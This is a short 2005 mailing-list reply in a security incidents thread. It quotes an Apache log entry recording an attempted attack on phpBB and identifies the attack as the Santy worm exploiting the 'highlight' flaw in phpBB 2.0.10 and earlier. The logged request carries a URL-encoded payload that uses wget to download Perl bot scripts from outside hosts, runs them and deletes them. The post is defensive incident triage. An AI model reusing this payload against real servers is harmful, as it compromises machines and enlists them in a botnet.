Security Incidents mailing list archives
Re: Attempted exploit for some web service.
From: Alex 'CAVE' Cernat <cave () cernat ro>
Date: Thu, 27 Jan 2005 17:40:09 +0200
Hi, I just got this in my apache logs: 65.39.227.110 - - [28/Jan/2005:00:23:26 +1300] "GET /RobinsStuff/UnsortedLinks&r ush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;mkdir%20.temp 22;cd%20.te mp22;wget%20http://www.quasi-sane.com/pics/bot.htm;wget%20http://webl icious.com/.notes/ssh2.htm;perl%20ssh2.htm;rm%20ssh.htm;perl%20bot.ht m;rm%20bot.htm%3B%20%6 5%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527. %70%61%73%73%74%68%72%75%28%24%48%5 4%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 200 11746 "-" "LWP::Simple/5.65"
it' an phpbb worm/exploit (i believe the name is Santy); it tries to exploit the highlight vulnerability in phpbb <= 2.0.10 if you don't have (unpatched) phpbb installation, you can stay tranquille Alex Cernat
Current thread:
- Attempted exploit for some web service. Robin (Jan 27)
- Re: Attempted exploit for some web service. Andrew Smith (Jan 27)
- Re: Attempted exploit for some web service. Alex 'CAVE' Cernat (Jan 27)